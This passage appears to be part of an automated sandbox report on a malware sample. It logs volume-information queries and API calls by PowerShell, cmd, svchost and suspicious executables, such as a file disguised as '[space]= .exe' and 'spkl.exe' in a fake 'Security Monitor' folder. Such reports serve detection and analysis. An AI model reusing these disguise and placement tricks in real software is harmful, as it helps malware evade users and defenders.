Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: lstrcpy,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA, 56_2_03374D8A
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: GetLocaleInfoA, 56_2_03379C9C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Queries volume information: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Queries volume information: C:\ VolumeInformation
